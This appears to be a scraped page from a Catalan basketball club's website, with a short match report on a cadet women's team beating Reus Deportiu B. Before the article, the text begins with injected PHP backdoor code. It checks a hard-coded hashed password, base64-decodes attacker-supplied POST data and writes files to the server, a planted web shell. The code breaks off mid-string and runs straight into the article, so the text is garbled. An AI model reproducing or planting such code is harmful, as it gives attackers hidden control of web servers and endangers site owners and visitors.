function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 05 B fa un segon quart per emmarcar i derrota el Reus Deportiu B (38-63) - Tgn Bàsquet Club -

El cadet femení 05 B fa un segon quart per emmarcar i derrota el Reus Deportiu B (38-63)

Updated: febrer 18, 2020

L’equip cadet femení 05 B va guanyar amb autoritat a la pista del Reus Deportiu. Les noies que entrena Adrià Adam van sentenciar el partit en un esplèndid segon període quan el TGN Bàsquet va augmentar la intensitat defensiva i això va provocar un parcial de 3-24 que va ser clau (8-32 al descans).

La bona dinàmica del segon quart va continuar després del descans tot i que les roig-i-negres van refer-se i gràcies a alguna badada defensiva tarragonina van ser capaces d’evitar una derrota encara més gran.